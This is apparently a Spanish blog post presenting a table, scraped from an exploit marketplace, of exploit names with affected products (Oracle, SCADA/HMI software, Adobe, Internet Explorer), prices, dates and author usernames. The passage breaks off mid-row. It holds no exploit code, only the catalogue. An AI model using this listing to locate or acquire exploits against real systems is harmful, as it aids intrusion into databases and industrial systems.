Aquí les dejo una tabla bastante extensa con los exploits, los productos afectados, el precio y el autor del exploit.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;

 &lt;br /&gt;
&lt;table border="1" cellpadding="0" cellspacing="0" style="width: 750px;"&gt;&lt;colgroup&gt;&lt;col style="mso-width-alt: 20772; mso-width-source: userset; width: 426pt;" width="750"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 4169; mso-width-source: userset; width: 86pt;" width="114"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 4022; mso-width-source: userset; width: 83pt;" width="110"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 3218; mso-width-source: userset; width: 66pt;" width="88"&gt;&lt;/col&gt;
 &lt;col style="mso-width-alt: 4973; mso-width-source: userset; width: 102pt;" width="136"&gt;&lt;/col&gt;
 &lt;/colgroup&gt;&lt;tbody&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl63" height="20" style="height: 15.0pt; width: 426pt;" width="568"&gt;product_name&lt;/td&gt;
  &lt;td class="xl64" style="width: 86pt;" width="114"&gt;product_price&lt;/td&gt;
  &lt;td class="xl63" style="width: 83pt;" width="110"&gt;&lt;span style="mso-spacerun: yes;"&gt;&amp;nbsp;&amp;nbsp;
  &lt;/span&gt;created_date&lt;/td&gt;
  &lt;td class="xl63" style="width: 66pt;" width="88"&gt;author_id&lt;/td&gt;
  &lt;td class="xl63" style="width: 102pt;" width="136"&gt;author_username&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CA Total Defense Suite
  deleteReportFilter Stored Procedure SQL Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;02-01-2012 14:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Novell iPrint Client ActiveX
  Control debug Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;02-01-2012 14:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Trend Micro Internet Security
  Pro 2010 ActiveX Control Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;50.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;02-01-2012 14:46&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle
  ABORT_TABLE_INSTANTIATION Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:30&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle CREATE_DATABASE_LINK
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:32&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle
  DELETE_REFRESH_OPERATIONS Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:32&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle DIFFERENCES Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:33&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle DISABLE_RECEIVER_TRACE
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:35&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle FROM_TZ() Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:36&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle GENERATESCHEMA Buffer
  Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;1500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-03-2011 21:01&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle GET_FULL_FILENAME
  Buffer Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-03-2011 20:57&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle9i INSTANTIATE_OFFLINE
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:39&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle9i KSDWRT Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:39&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle NUMTODSINTERVAL()
  Buffer Overflow.&lt;/td&gt;
  &lt;td class="xl66"&gt;1500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;22-03-2011 21:03&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle NUMTOYMINTERVAL()
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:41&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle PARALLEL_PUSH_RECOVERY
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:42&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle10g PITRIG_DROP Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:43&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle10g PITRIG_DROPMETADATA
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:44&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle10g PITRIG_TRUNCATE
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:44&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle SYS.LTUTIL Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:45&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle9i
  REGISTER_USER_REPGROUP Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:47&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle SDO_CODE_SIZE Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:48&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle SET TIME_ZONE Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:48&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle CTX_OUTPUT() Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:49&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle TO_TIMESTAMP_TZ()
  Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:50&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle TZ_OFFSET() Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:51&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle DBMS_AQADM Buffer
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:52&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;DBMS_JVM_EXP_PERMS Escalation&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:53&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Oracle extjob.exe Command
  Execution Vulnerability&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;06-10-2011 10:42&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;CTXSYS.DRILOAD SQL Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;125.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;26-01-2011 15:37&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;SET_OUTPUT_TO_JAVA SQL
  Injection&lt;/td&gt;
  &lt;td class="xl66"&gt;1000.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;18-03-2011 16:55&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Symantec Alert Management
  System ModemString Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-06-2012 11:39&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Symantec Alert Management
  System PinNumber Buffer Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;27-11-2011 14:41&lt;/td&gt;
  &lt;td class="xl65"&gt;60&lt;/td&gt;
  &lt;td class="xl65"&gt;Mario&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;KingView 6.53 SCADA HMI
  HistorySvr Heap Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;23-03-2011 13:31&lt;/td&gt;
  &lt;td class="xl65"&gt;84&lt;/td&gt;
  &lt;td class="xl65"&gt;Ian&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IGSS IGSSdataServer.exe opcode
  0xd overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;15-06-2011 10:55&lt;/td&gt;
  &lt;td class="xl65"&gt;89&lt;/td&gt;
  &lt;td class="xl65"&gt;hal&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Opera Browser 10.62
  border-radius (SVG handler) Memory Corruption&lt;/td&gt;
  &lt;td class="xl66"&gt;100.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;17-06-2011 8:51&lt;/td&gt;
  &lt;td class="xl65"&gt;184&lt;/td&gt;
  &lt;td class="xl65"&gt;Ss3c&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;FactoryLink vrn.exe opcode 9
  overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;15-06-2011 10:55&lt;/td&gt;
  &lt;td class="xl65"&gt;89&lt;/td&gt;
  &lt;td class="xl65"&gt;hal&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Lotus Domino iCalendar Stack
  Overflow&lt;/td&gt;
  &lt;td class="xl66"&gt;1500.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;14-06-2011 15:43&lt;/td&gt;
  &lt;td class="xl65"&gt;209&lt;/td&gt;
  &lt;td class="xl65"&gt;jgrusko&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;IBM Lotus Domino 8.5.2
  WebAdmin.nsf Cross-Site Scripting Vulnerability&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;10-07-2011 5:59&lt;/td&gt;
  &lt;td class="xl65"&gt;126&lt;/td&gt;
  &lt;td class="xl65"&gt;r0i&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Site License&lt;/td&gt;
  &lt;td class="xl66"&gt;0.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;20-07-2011 2:29&lt;/td&gt;
  &lt;td class="xl65"&gt;&lt;br /&gt;&lt;/td&gt;
  &lt;td class="xl65"&gt;&lt;br /&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe Flash Player newfunction
  rop 2&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 15:43&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe Flash Player newfunction
  rop 3&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 15:43&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe Flash Player newfunction
  rop 4&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 15:44&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_1&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 15:59&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_2&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:00&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_3&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:03&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_4&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:02&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_5&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:04&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_6&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:04&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_7&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:06&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_8&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:08&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_9&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:09&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_10&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:10&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_11&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:10&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_12&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:11&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_13&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:12&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_14&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:13&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;ms11_003_ie_css_import_stackpivot_rop_15&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;30-07-2011 16:14&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe Flash Player newfunction
  rop 1&lt;/td&gt;
  &lt;td class="xl66"&gt;200.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-08-2011 15:24&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
  &lt;td class="xl65" height="20" style="height: 15.0pt;"&gt;Adobe CoolType SING Table
  winxp rop 1&lt;/td&gt;
  &lt;td class="xl66"&gt;250.0000&lt;/td&gt;
  &lt;td class="xl67"&gt;01-08-2011 18:13&lt;/td&gt;
  &lt;td class="xl65"&gt;62&lt;/td&gt;
  &lt;td class="xl65"&gt;NSSLabs&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr height="20" style="height: 15.0pt;"&gt;
